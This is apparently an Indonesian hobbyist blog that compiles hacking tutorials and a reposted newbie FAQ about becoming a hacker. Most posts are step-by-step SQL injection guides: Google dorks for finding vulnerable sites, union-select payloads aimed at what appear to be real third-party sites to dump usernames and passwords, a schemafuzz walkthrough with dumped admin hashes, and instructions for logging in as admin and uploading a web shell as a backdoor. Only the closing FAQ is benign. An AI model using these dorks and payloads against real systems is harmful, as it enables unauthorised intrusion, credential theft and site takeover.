Hacking lagi Hacking lagi

ternyata hacking dan mendapat gelar seorang hacker itu tidak semua yang orang-orang bayangkan. banyak yang harus dikorbankan untuk mencapai tujuan itu.

untuk menjadi seorang hacker menurut saya itu tidak cukup dengan kemauan doank. karena masih banyak faktor penunjang yang tidak kalah pentingnya dengan kemauan.

kebanyakan orang mengatakan " dimana ada kemauan disitu ada jalan" memang tidak salah seeh tapi ada hal yang harus kita perhatikan. ada unsur penunjang kemauan itu.

contohnya.
kemauan kita besar untuk menjadi seorang hacker tapi sarana kita untuk bergerak tidak ada. moso mau jadi hacker gag punya koneksi internet atau gag punya kompi sendiri. heheheheh

jadi bukan kemauan segalanya tapi modal juga perlu.

selain itu masih ada pengorbanan yang lain, seperti : harus rela mata melek sampai pagi karena untuk belajar pada seorang ahli secara langsung itu perlu hunting kiri dan kanan untuk mencari suhu... hehehehehe

mungkin cukup dulu yah....

mohon maaf kepada master2 jika artikel ini salah

simple hacking for you

Banyak cara yang dapat di gunakan untuk melakukan hacking,mulai dari sql injection,rfi,lfi and dll…..tergantung dari kita sendiri ingin melakukannya dengan teknik yang mana .klo untuk saya pribadi tidak memilih satupun,maklum bukan hacker,cuman seorang blogger .Nah berikut ini ada trick yang sangat simple yang bisa di gunakan melakukan kegiatan hacking tersebut

buat para master atau yang udah lama bergelut di dunia hacking trik ini mungkin udah basi dan sangat mudah.jadi klo udah master gag perlu baca artikel seperti ini.ini cuman khusus untuk newbie

okeh!!tanpa penjelasan panjang dan lebar mari kita mulai saja

seperti biasa dalam melakukan kegiatan hacking persiapkan alat serta bahannya….wkwkkwk…:P

alat dan bahannya adalah :

1.komputer atau laptop yang terhubung dengan internet

2.posisi yang nyaman,gunanya biar betah tinggal depan kompi

3.cemilan biar gag laper

4.sebungkus rokok sampoerna

5.kopi hitam gag pake gula,buat begadang

jika alat terebut sudah lengkap silahkan menuju paman google .
nah pada form search google masukkan keyword berikut ini

inurl:group_concat(username,0×3a,password)

inurl:group_concat(username,0x3a,password)

gag ada yang muncul yah??? kasian di blok tu baris yang kosong

kemudian liat hasil pencariannya

tarrrrrrrrrrraaaaaaaaa…………………………………… akan bermunculan site yang menanmpilkan password serta user loginnya….:D hehehehehe

contoh yang saya dapatkan :

http://www.archdiocese.la/news/story.php?newsid=-1001+union+select+1,2,3,4,5,group_concat(0×3c703e,username,0×3a,password),version(),8,9,10,11,12,13,14,15,16,17,18+from+users

http://www.cdb.gov.bt/faq.php?Id=-70+union+select+1,version(),group_concat(0×3c703e,login_name,0×3a,password)+from+users

skrg tinggal mencari halaman login adminnya

selamat mencoba

Share7

[x] close

tutorial schemafuzz

Langsung aja tutornya ya
siapkan alat dan bahan sebagai berikut :
1.Python (http://www.python.org/ftp/python/2.5/python-2.5.msi)
2.Schemafuzz (http://darkc0de.com/others/schemafuzz.py)
3.CMD
4.Konsole (bagi pengguna linux)

bagi pengguna windust ikuti langkah berikut
buka menu CMD kemudian masuk kedalam directori Cdengan menggunakan perintah
cd c:\ enter
c:\>schemafuzz.py enter

Bagi pengguna linux tinggal mengetikkan di konsloe perintah berikut

./schemafuz.py enter

oke
setalah masuk ke direktory schemafuzz
tingal ikuti langkah selanjutnya

1.Cari target
Misal: http://127.0.0.1/site/phpweb/forum.php?forum=1

sebelum kita melangkah lebih lanjut perlu kita ketahui apa saja perintah yang harus digunakan.

caranya seperti ini ./schemafuzz.py -h help

kita temukan sebagian perintahnya seperti ini

–schema, –dbs, –dump, –fuzz, –info, –full, –findcol

langkah pertama

./schemafuzz.py -u “http://127.0.0.1/site/phpweb/forum.php?forum=1″ –findcol

diperoleh seperti ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1–

[+] Evasion Used: “+” “–”

[+] 01:32:04

[+] Proxy Not Given

[+] Attempting To find the number of columns…

[+] Testing: 0,1,2,3,4,5,

[+] Column Length is: 6

[+] Found null column at column #: 1

[+] SQLi URL: http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,1,2,3,4,5–

[+] darkc0de URL: http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5

[-] Done!

langkah kedua

————–

setelah ketemu kita masukkan copy yang darkc0de URL jadi seperti ini

./schemafuzz.py -u “http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5″ –fuzz

diperoleh seperti ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5–

[+] Evasion Used: “+” “–”

[+] 01:37:09

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration…

Database: webthings

User: testing@localhost

Version: 5.0.51a

[+] Number of tables names to be fuzzed: 354

[+] Number of column names to be fuzzed: 263

[+] Searching for tables and columns…

[+] Found a table called: mysql.user

[+] Now searching for columns inside table “mysql.user”

[!] Found a column called:user

[!] Found a column called:password

[-] Done searching inside table “mysql.user” for columns!

[-] [01:37:48]

[-] Total URL Requests 618

[-] Done

langkah ketiga

—————

Setelah kita temukan nama databasenya trus kita lanjutkan kelangkah berikutnya

./schemafuzz.py -u “http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5″ –schema -D namadatabasenya

./schemafuzz.py -u “http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5″ –schema -D webthings

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5–

[+] Evasion Used: “+” “–”

[+] 01:43:11

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration…

Database: webthings

User: testing@localhost

Version: 5.0.51a

[+] Showing Tables & Columns from database “webthings”

[+] Number of Tables: 33

[Database]: webthings

[Table: Columns]

[0]wt_articles: cod,article_id,subtitle,page,text,text_ori,htmlarticle,views

[1]wt_articles_title: article_id,category,title,active,date,userid,views

[2]wt_articlescat: cod,category

[3]wt_banners: cod,name,active,image,url_image,url,code,views,clicks,periode,start_date,end_date

[4]wt_banners_log: banner,date,views,clicks,sessions

[5]wt_banners_rawlog: banner,type,date,session

[6]wt_centerboxes: cod,pos,active,oneverypage,menuoption,title,content,file,type,draw_box

[7]wt_comments: cod,type,link,date,userid,comment

[8]wt_config: id,config

[9]wt_downloads: id,category,name,active,url,date,size,count,rate_sum,rate_count,short_description,description,small_picture,big_picture,
author_name,author_email,comments,url_screenshot,license,license_text

[10]wt_downloadscat: cod,ref,name,descr

[11]wt_faq: cod,topic,uid,active,question_ori,question,answer_ori,answer

[12]wt_faq_topics: cod,name

[13]wt_forum_log_topics: uid,msgid,logtime,notifysent

[14]wt_forum_msgs: cod,forum,msg_ref,date,userid,title,text_ori,date_der,views,closed,sticky,modifiedtime,modifiedname,notifies

[15]wt_forums: cod,title,descr,locked,notifies,register

[16]wt_forums_mod: forum,userid,type

[17]wt_guestbook: id,datum,naam,email,homepage,plaats,tekst

[18]wt_links: id,category,active,name,url,count,descr,obs

[19]wt_linkscat: cod,name,descr,parent_id

[20]wt_menu: id,pos,title,url,type,newwindow,lang

[21]wt_news: cod,lang,category,catimgpos,date,title,userid,image,align,active,counter,text,text_ori,full_text,
full_text_ori,archived,sidebox,sideboxtitle,sideboxpos

[22]wt_newscat: cod,name,image

[23]wt_online: id,time,uid

[24]wt_picofday: id,category,userid,small_picture,big_picture,description,full_description,views,clicks

[25]wt_picofdaycat: id,name,description

[26]wt_picofdaysel: date,picture_id,views,clicks

[27]wt_polls: cod,dtstart,dtend,question,item01,item02,item03,item04,item05,item06,item07,item08,item09,item10,
count01,count02,count03,count04,count05,count06,count07,count08,count09,count10

[28]wt_sideboxes: cod,pos,side,active,title,content,file,type,function,modules

[29]wt_user_access: userid,module

[30]wt_user_book: userid,cod_user

[31]wt_user_msgs: cod,userid,folder,date,user_from,title,msg_read,text,notify

[32]wt_users: uid,name,password,class,realname,email,question1,question2,url,receivenews,receiverel,country,
city,state,icq,aim,sex,session,active,comments,

newsposted,commentsposted,faqposted,topicsposted,dateregistered,dateactivated,lastvisit,logins,
newemail,newemailsess,avatar,lang,theme,signature,banned,msn,showemail

[-] [01:43:48]

[-] Total URL Requests 270

[-] Done

untuk mengetahui apakah kita bisa load_file dalam site tersebut gunakan perintah ini

./schemafuzz.py -u “http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5″ –info

maka akan tampil seperti ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5–

[+] Evasion Used: “+” “–”

[+] 01:46:51

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration…

Database: webthings

User: testing@localhost

Version: 5.0.51a

[+] Do we have Access to MySQL Database: Yes <– w00t w00t

[!] http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,concat(user,0×3a,password),2,3,4,5+FROM+mysql.user–

[+] Do we have Access to Load_File: No

[-] [01:46:51]

[-] Total URL Requests 3

[-] Done

ternyata kita gak bisa load_file tapi bisa mengakses ke database mysqlnya hehehe

untuk mengetahui beberapa database yang terdapat pada site tersebut, kita gunakan perintah seperti ini

./schemafuzz.py -u “http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5″ –dbs

akan tampil seperti ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5–

[+] Evasion Used: “+” “–”

[+] 01:58:15

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration…

Database: webthings

User: testing@localhost

Version: 5.0.51a

[+] Showing all databases current user has access too!

[+] Number of Databases: 1

[0] webthings

[-] [01:58:17]

[-] Total URL Requests 30

[-] Done

langkah selanjutnya

——————–

cara untuk menemukan user dan password

kita gunakan perintah –dump -D namadatabase -T namatabel -C namakolom

setelah kita menemukan nama database, nama tabel dan kolom tinggal kita masukkan perintah seperti ini

./schemafuzz.py -u “http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5″ –dump -D webthing -T wt_users -C name,password

eing ing eng….

jreennnng….keluar deh user ama passwordnya

hasilnya dibawah ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5–

[+] Evasion Used: “+” “–”

[+] 02:08:47

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration…

Database: webthings

User: testing@localhost

Version: 5.0.51a

[+] Dumping data from database “webthings” Table “wt_users”

[+] Column(s) ['name', 'password']

[+] Number of Rows: 2

[0] admin:e00b29d5b34c3f78df09d45921c9ec47:

[1] user:098f6bcd4621d373cade4e832627b4f6:

[-] [02:08:48]

[-] Total URL Requests 4

[-] Done

jangan lupa kita selalu mengecek schemafuzzlog.txt nya

[x] close

Teknik SQL injection + Backdooring

teknik SQLi ini Banyak di Gunakan Oleh para hacker untuk mencari Bugs pada website Target walapun terkadang ada juga yang menggunakan Dork pada bantuan Google
"Backdooring", seperti namanya backdoor yaitu pintu belakang, artinya para hacker (Black Hat) tidak jarang melakukan ini pada website target, dengan membuat jalur sendiri untuk bisa memodifikasi Website korban tanpa harus masuk ke Admin web tersebut karena mereka biasanya telah meng Upload Shell pada web target, cara melakukan Upload Shell tidak begitu sulit, cukup mencari Fitur UPLOAD pada Menu Admin, dan Bimsalabim, NAsib Website ada di tangan Anda.
Ok, saya langsung saja menjelaskan tutorial saya ini, caranya yaitu :




1.Kita tetapkan target terlebih dahulu
contoh: [site]/news_Event/newsDetail.php?ID=2

anda tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada vulnability.
contoh:
[site]/news_Event/newsDetail.php?ID=-2 atau [site]/news_Event/newsDetail.php?ID=2'



2.mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : +order+by+

contoh:
[site]//news_Event/newsDetail.php?ID=-2+order+by+1--

sekarang cek secara satu per satu
contoh:
[site]/news_Event/newsDetail.php?ID=-2+order+by+1--
[site]/news_Event/newsDetail.php?ID=-2+order+by+2--
[site]/news_Event/newsDetail.php?ID=-2+order+by+3--
[site]/news_Event/newsDetail.php?ID=-2+order+by+4--

sehingga muncul error atau hilang pesan error.
misal:
[site]/news_Event/newsDetail.php?ID=-2+order+by+5--

berarti yang kita ambil adalah sampai angka 4
menjadi
[site]/news_Event/newsDetail.php?ID=-2+order+by+4--



3.untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 5
maka:
[site]/news_Event/newsDetail.php?ID=-2+order+by+4--

nah ,yg keluar angka 2
gunakan perintah version() untuk mengecek versi sql yg diapakai masukan perintah tsb pada angka yg keluar tadi
contoh:
[site]/news_Event/newsDetail.php?ID=-2+union+select+1,version(),3,4--

lihat versi yg digunakan, jika versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table dan column yang ada pada web tersebut karena tidak bisa menggunakan perintah from+information_schema
untuk versi 5 berarti anda beruntung tak perlu menebak table dan column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah from+information_schema



4.Untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) -> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database()-- -> dimasukan setelah angka terakhir

contoh:
[site]/news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(table_name),3,4+from+information_schema.tables+where+table_schema=database()--

jika yang kita cari adalah "admin"



5.Perintah group_concat(column_name) -> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- -> dimasukan setelah angka terakhir

[site]/news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(column_name),3,4+from+information_schema.columns+where+table_name=0xhexa--

pada tahap ini kalian wajib menconvert kata pada isi table menjadi hexadecimal.
website yg digunakan untuk konversi :

http://tools.vyc0d.com/converter/

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646d696e

[site]news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(column_name),3,4+from+information_schema.columns+where+table_name=0x61646d696e--



6.Memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah group_concat(0x3a,hasil isi column yang mau dikeluarkan) -> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) -> dimasukan setelah angka terakhir

[site]/news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(0x3a,hasil isi column),3,4+from+(nama table berasal)--

contoh kata yang keluar adalah adminID,Name,password

maka
[site]/news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(adminID,0x3a,Name,0x3a,password),3,4+from+admin--

Nah dah nemu ID dan password-nya sekarang :D

ket: 0x3a sama dengan : <- titik dua



8.Mencari halaman login Admin
Login sebagai admin
Cari fitur2 upload file atau gambar, lalu upload shell kalian
Selesai.

Tutorial SQLi bagian kedua

========================================================
tutorial ini murni copas maaf master....
dari ----> http://lewonk.blogspot.com/2010/01/tutorial-sqli-part-2_01.html
ASLI SAYA BINGUNG JUGA NGEJALANINNYA MAKLUM CUPU CYBER
======================================================

OK, aku akan melanjutkan tutorial SQLi yang lalu, Setelah kita tekan enter url tersebut. Maka, yang akan kita cari selanjutnya adalah informasi name dan password. Perlu diingat setiap situs memiliki istilah berbeda-beda, ada yang username, atau login, atau user, atau admin_login dan pass, atau password pokoknya yang mirip-mirip dengan istilah diatas itulah yang kita cari. Anggap saja kita sudah dapatkan username dan password, lalu kita ubah urlnya menjadi seperti berikut:
http://malingshitanjing.com/index.php?id=-3=union+all+select+1,concat(username,char(58),password),3,4,5,6+from+tbl_user--
maka halaman yang akan keluar berisi username:password, anggap saja kita sudah berhasil mendapatkan informasinya, kalau kita punya ingatan yang buruk alangkah baiknya kalau kita mencatat informasi-informasi penting dalam notepad.

Mencari Page Admin

Inilah hal terakhir yang harus kita lakukan dalam SQLi, mencari halaman login admin situs target kita. Karena percuma kita mengetahui username dan passwordnya bila tak bisa mencari halaman adminnya. Ada banyak cara untuk mencari page adminnya, disini kita memakai tool intellitampeler (tool bisa didownload disini) atau admin finder online yang sekarangpun sudah ada. Nah, kalau kita sudah berhasil menemukan halaman adminnya, masukkan username dan password yang sudah kita dapatkan tadi lalu login. Hahahhaha kita sudah berhasil masuk… selanjutnya terserah anda bro…

Nb: Segala sesuatu yang terjadi akibat tutorial ini bukanlah tanggung jawab penulis, tanggung sendiri jangan bawa-bawa saya. Disini saya Cuma berbagi ilmu yang juga masih dangkal biar bermanfaat untuk kebaikan…emang benar buat kebaikan wehehehehe

SAYA JUGA TIDAK BERTANGGUNG JAWAB

Tutorial SQLi Bagian Pertama

========================================================
tutorial ini murni copas maaf master....
dari ----> http://lewonk.blogspot.com/2010/01/tutorial-sqli-untuk-pemula-part-1.html
ASLI SAYA BINGUNG JUGA NGEJALANINNYA MAKLUM CUPU CYBER
=======================================================

Pertama-tama, weh-weh terlalu formal neh. Coretan2 dibawah ini buatan seorang yang bodoh jadi kalau ada salahnya mohon maap ya tmen2. Mungkin diantara kita ada yang bertanya? apakah yang dimaksud SQLi. Wah kalo gitu pertanyaannya silahkan googling pliss, SQLi (aka Sql Injection Structured Query Language Injection) adalah salah satu cara termudah untuk mengeksploitasi / hacking situs. Cara ini tergolong mudah tapi hasilnya bukan main-main, apalagi buat orang bodoh kayak saya wakkakakakka..Akan tetapi kebanyakan tutorial SQLi sangat buruk (bukan maksud mengejek), So itulah alasan mengapa aku menulis coretan ini. SQLi memang teknik dasar memasukkan query ke database untuk memperoleh admin dan passwordnya...
Step 1: Mencari Situs yang vulnerability SQLi

Mencari situs yang bisa terinfeksi virus sqli itu sangat mudah tinggal kita googling aj, dan masukin salah satu dork berikut:

inurl:news_view.php?id=

inurl:sql.php?id=

shredder-categories.php?id=

buy.php?category=

t-shirt/product.php?id=

sebenarnya masih banyak sekali model-model dork tetapi sayang, aku males nulisnya hehehehe

setelah masukin dork tadi, langsung pelototin situs2 yang nongol dilayar monitor, seperti:

http://www.malingshitanjing.com/index.php?id=3

untuk ngecek situs tersebut vulnerability sqli, hal yang harus dilakukan adalah ketik " pada akhir url. jadi sekarang urlnya jadi seperti ini:

http://www.malingshitanjing.com/index.php?id=3"

tekan enter dan kamu akan akan menemukan error

warning:you have error sql kampret kayak yang baca hehehe, check the manual qorresponden mysql bla bla....

bila itu terjadi berarti situs itu bisa injeksi

udah basa-basinya langsung aja ya bro

kita masukin querry lagi pada url

http://www.malingshitanjing.com/index.php?id=-3+union+all+select+1--

bila page yang tampil masih error atau normal( mungkin dihidden oleh admin), jangan putus asa terus masukin querrynya

http://www.malingshitanjing.com/index.php?id=-3+union+all+select+1,2--

http://www.malingshitanjing.com/index.php?id=-3+union+all+select+1,2,3--

http://www.malingshitanjing.com/index.php?id=-3+union+all+select+1,2,4--

http://www.malingshitanjing.com/index.php?id=-3+union+all+select+1,2,5--

http://www.malingshitanjing.com/index.php?id=-3+union+all+select+1,2,3,4,5,6--

sebut saja kita sudah dapat page yang berisi nomor 2

lalu kita masukan querry ini

http://www.malingshitanjing.com/index.php?id=-3+union+all+select+1,table_name,3,4,5,6+from+information_schema.tables+where+table_schema=database()+limit+0,1--

kemudian akan muncul page beserta isi dari "table"nya seperti id, name, password tapi muncul satu persatu. buruknya kita harus mencari satu-satu dengan menambahkan querry

http://www.malingshitanjing.com/index.php?id=-3+union+all+select+1,table_name,3,4,5,6+from+information_schema.tables+where+table_schema=database()+limit+1,1--

http://www.malingshitanjing.com/index.php?id=-3+union+all+select+1,table_name,3,4,5,6+from+information_schema.tables+where+table_schema=database()+limit+2,1--

mungkin ada yang mengira url2 diatas tak dirubah tapi cobalah melirik ke akhir url, disitu "0,1" diganti dengan "1,1" terus "2,1" dst sampai kita dapat informasi sesuai keinginan kita. Tapi yang paling penting kita harus dapatkan tabel dengan nama seperti: tbl_user / tbl_admin / user / admin atau apalah yang mirip kata-kata tersebut. Anggap saja kita sudah dapat "tbl_user". Selanjutnya kita ubah "tbl_user" menjadi apa ya....????? pokoknya kita masuk ke piclist.com/techref/ascii lalu kita masukan "tbl_user" lalu kita konvert ke HEX string. lalu kode pada HEX kita copy dan pastekan pada url setelah kata table_name=0x

http://www.malingshitanjing.com/index.php?id=-3+union+all+select+1,column_name,3,4,5,6+from+information_schema.columns+where+table_name=0xM4l1N9SH1T4NJ1NG+limit+0,1--

jangan lupa tekan enter, lalu akan muncul page yang merupakan isi dari kolom tersebut

BERSAMBUNG, malas ngetiknya ngantuk.......klo ada yang komentar nanti saya lanjutin...ok

Bagaimana Menjadi Seorang Hacker???

hahahaha akhirnya diblogku terpasang cara menjadi seorang hacker... asli ini hasil jiplak tapi dah minta ijin ma yang posting dan diberi ijin jadi tak jiplak aja..

==============================================
murni copas dari http://bi4kkob4r.net/2009/11/13/bagaimana-menjadi-hacker/
Online @ http://www.echo.or.id :: http://ezine.echo.or.id

==== F.A.Q for NEWBIES Version 1.0 ===

Intr0
—–

Tulisan ini aku buat karena aku menyadari susahnya menjadi newbie , newbie yang nanya kesana kemari dengan harapan dapet jawaban yang jelas, tetapi malah di kerjain, di isengin bahkan di boongin, lebih parahnya lagi kalo cuma di ajarin cara instan, trust me ? bisa deface 1,2, 4, … 1000 sites tidak menjadikan kamu hacker !!! pengen terkenal ? yupe kamu berhasil !! (mohon maaf juga , jika semua yang baca bilang kalo aku munafik,aku akuin kl aku juga pernah mendeface ,but tidak ada kata terlambat untuk menyadarinya )

Stop! jangan salah menyangka dan menuduh kalo aku sudah lebih hebat dari teman2, dan merasa sok hebat untuk meng-gurui teman2, TIDAK! ini hanyalah apresiasi terhadap usaha teman-teman yang mau belajar dan terus terang artikel inipun secaragaris besar meniru artikel “HOW TO BECOME A HACKER” oleh kang “eric S R ” dan telah menyalin ulang beberapa poin penting dari artikel berlicensi GPL tsb.

Artikel inipun telah di bubuhi tambalan2 dari beberapa pertanyaan yang sering di temui. Adapun yang aku coba lakukan adalah hanya coba mendokumentasikannya disini dengan harapan jika ada yang memerlukannya dapat dengan mudah me-refer ke artikel ini.

Soal Version 1.0 , aku sengaja menambahkan versi agar artikel ini tidak baku, artinya bisa di perbaiki , dihapus, di edit, di sempurnakan sesuai dengan masukan dari semua teman2 dan perkembangan yang terjadi nantinya .

[F.A.Q]

[0] T : Tolong Jelaskan Apa Itu HAcker ?
J : Hacker adalah: Seseorang yang tertarik untuk mengetahui secara mendalam mengenai kerja suatu system, komputer, atau jaringan komputer.”

[1] T : Maukah Anda mengajari saya cara hacking?
J : Hacking adalah sikap dan kemampuan yang pada dasarnya harus dipelajari sendiri. Anda akan menyadari bahwa meskipun para hacker sejati bersedia membantu,
mereka tidak akan menghargai Anda jika Anda minta disuapi segala hal yang mereka ketahui

Pelajari dulu sedikit hal. Tunjukkan bahwa Anda telah berusaha, bahwa Anda mampu belajar mandiri. Barulah ajukan pertanyaan-pertanyaan spesifik pada hacker yang Anda jumpai.

Jika toh Anda mengirim email pada seorang hacker untuk meminta nasihat, ketahuilah dahulu dua hal. Pertama, kami telah menemukan bahwa orang-orang yang malas dan sembrono dalam menulis biasanya terlalu malas dan sembrono dalam berpikir sehingga tidak cocok menjadi hacker — karena itu usahakanlah mengeja dengan benar, dan gunakan tata bahasa dan tanda baca yang baik, atau Anda tidak akan diacuhkan.

Kedua, jangan berani-berani meminta agar jawaban dikirim ke alamat email lain yang berbeda dari alamat tempat Anda mengirim email; kami menemukan orang-orang ini biasanya pencuri yang memakai account curian, dan kami tidak berminat menghargai pencuri

T : Kalau begitu arahkan saya?
J : Baiklah , kamu harus belajar !!

T : Apa yang harus di pelajari ?
J : Networking (jaringan) , Programing , Sistem Operasi , Internet

T : wow, apa gak terlalu banyak tuh ?
J : Tidak, Semua itu tidak harus kamu kuasai dalam waktu cepat, basicnya yang penting Ingat semua itu perlu proses!

T : Networking saya mulai dari mana ?
J : Pengetahuan dasar jaringan ( konsep TCP/IP) , komponen dasar jaringan, topologi jaringan, terlalu banyak artikel yang dapat kamu baca dan buku yang bertebaran
di toko toko buku, atau kamu bisa mencoba berkunjung kesitus ilmukomputer.com

T : Untuk programing ?
J : Mungkin yang terpenting adalah ‘logika’ pemrograman , jadi lebih kearah pemanfaatan logika , ada baiknya belajar algoritma , pengenalan flowchart atau bagan alur untuk melatih logika (teoritis) serta untuk prakteknya sangat disarankan belajar pemrograman yang masih menomer satukan logika/murni

T : Kalau begitu bahasa pemrograman apa yang harus saya pelajari awalnya?
J : Bahasa Pemrograman apapun sebenarnya sama baik, tetapi ada baiknya belajar bahasa seperti C , Perl , Phyton, Pascal, C++ , bukan berarti menjelek-jelekkan visual programing ( nanti kamu akan tau bedanya ) (*ini murni pengalaman pribadi)

[3] T : Bagaimana saya harus memulai programing ?
J : Kumpulkan semua dokumentasi, manual, how to , FAQ , buku , dan contoh contoh dari bahasa pemrograman yang akan anda pelajari , Cari dan install software yang dibutuhkan oleh bahasa tersebut (Sesuai dokumentasi) , cobalah memprogram walaupun program yang simple, dan kamu tidak di “haramkan” untuk mengetik ulang program contoh dengan harapan kamu akan lebih mengerti dibandingkan kamu hanya membaca saja, cari guru, teman atau komunitas yang bisa diajak bekerja sama dalam mempelajari bahasa tersebut ( gabung dimilis, forum khusus bahasa tsb ) , sisanya tergantung seberapa besar usaha kamu. jangan mudah menyerah apalagi sampai putus asa.

[1] T : Apakah Visual Basic atau Delphi bahasa permulaan yang bagus?
J : Tidak, karena mereka tidak portabel. Belum ada implementasi open-source dari bahasa-bahasa ini, jadi Anda akan terkurung di platform yang dipilih oleh vendor. Menerima situasi monopoli seperti itu bukanlah cara hacker.

[1] T : Apakah matematika saya harus bagus untuk menjadi hacker?
J : Tidak. Meskipun Anda perlu dapat berpikir logis dan mengikuti rantai pemikiran eksak, hacking hanya menggunakan sedikit sekali matematika formal atau aritmetika.

Anda terutama tidak perlu kalkulus atau analisis (kita serahkan itu kepada para insinyur elektro . Sejumlah dasar di matematika finit (termasuk aljabar Bool, teori himpunan hingga, kombinasi, dan teori graph) berguna.

T : Tentang pemrograman Web , apakah harus ?
J : Yupe, dikarenakan Internet adalah dunia kamu nantinya

T : Bahasa pemrograman web apa yang sebaiknya dipelajari untuk pemula ?
J : Mungkin kamu bisa mencoba HTML, dilanjutkan ke PHP yang akan membuat kamu lebih familiar ke programing secara penuh

T : Tentang Sistem Operasi , kenapa harus ?
J : Penguasaan terhadap suatu operating system adalah sangat penting, kenapa ? karena itulah lingkungan kamu nantinya , perdalami cara kerja suatu operating system , kenali dan akrabkan diri

T : Sebaiknya, Operating system apa yang saya perdalami?
J : mungkin kamu bisa coba linux atau BSD , selain mereka free , dukungan komunitas juga sangat banyak sehingga kamu tidak akan di tinggal sendirian jika menemukan masalah, dan pula kemungkinan kamu untuk dapat berkembang sangatlah besar dikarenakan sifat “open source”

T : Untuk pemula seperti saya , apa yang harus saya gunakan ?
J : Sebaiknya jika kamu benar benar pemula, kamu bisa gunakan linux , karena baik sistem installasinya dan Graphical User Interfacenya lebih memudahkan kamu

T : Distro apa yang sebaiknya saya gunakan dan mudah untuk pemula
J : Kamu bisa mencoba Mandrake (disarankan oleh beberapa ahli yang pernah diajak diskusi) , tetapi kamu bisa memilih sesukamu, meskipun aku memulainya juga dengan mandrake tetapi aku lebih comfort dengan redhat.

T : Kalau tidak bisa Menginstall linux apakah jalan saya sudah tertutup?
J : Kamu bisa mencoba menginstall vmware , cygwin atau kamu bisa menyewa shell

T : Dimana Saya bisa mendapatkan programn program tersebut
J : berhentilah bertanya , dan arahkan browser kamu ke search engine , terlalu banyak situs penyedia jasa yang dapat membantu kamu

T : Apakah saya HArus memiliki komputer ?
Y : IYA! , kecuali kalo kamu sudah dapat berinteraksi lebih lama dengan komputer meskipun itu bukan milik kamu, tetapi sangat baik jika memilikinya sendiri karena , pertama : Ide yang timbul bisa setiap saat, baik programing, riset dsb, jadi ada baiknya kamu memilikinya agar dapat langsung menyalurkan semua ide dan pemikiran kamu.
Kedua : menggunakan PC sendiri membuat kamu merasa bebas untuk bereksplorasi dan mencoba tanpa takut merusak dsb

T : Hardware apa yang saya butuhkan ?
Y : Menginggat harga komputer sudah relatif “murah” (mohon maaf buat yang masih belum mampu membelinya) , kamu bisa sesuaikan spesifikasinya untuk kamu gunakan

T : Internet , apakah saya harus terkoneksi ke internet?
Y : Terkadang itu perlu, tetapi jangan terlalu memaksakan , kamu memang perlu terhubung ke internet untuk mendownload modul, bacaan, update informasi, tetapi jangan jadikan penghalang jika kamu tidak bisa terkoneksi secara periodik, jadilah kreatif

[1] T : Berapa lama waktu yang saya butuhkan?
J : Masalah waktu itu relatif, Bergantung seberapa besar bakat dan usaha Anda. Kebanyakan orang memperoleh keahlian yang cukup dalam delapan belas bulan
atau dua tahun, jika mereka berkonsentrasi. Tapi jangan pikir setelah itu selesai; jika Anda hacker sejati, Anda akan menghabiskan sisa waktu belajar dan menyempurnakan keahlian.

T : Apakah tidak bisa yang Instan ? misal Tinggal gunain tool tertentu ?
J : Hum, kamu mo jadi hacker atau cuma pemakai tools ?, kalau menggunakan tools semua orang juga bisa!!

[1] T : Bagaimana cara mendapatkan password account orang lain?
J : Ini cracking. Pergi sana, bodoh.

[1] T : Bagaimana cara menembus/membaca/memonitor email orang lain?
J : Ini cracking. Jauh-jauh sana, goblok

[0] T : Cracker ? apa itu ?
J : Cracker adalah individu yang mencoba masuk ke dalam suatu sistem komputer tanpa ijin (authorisasi), individu ini biasanya berniat jahat/buruk, sebagai kebalikan dari ‘hacker’, dan biasanya mencari keuntungan dalam memasuki suatu sistem

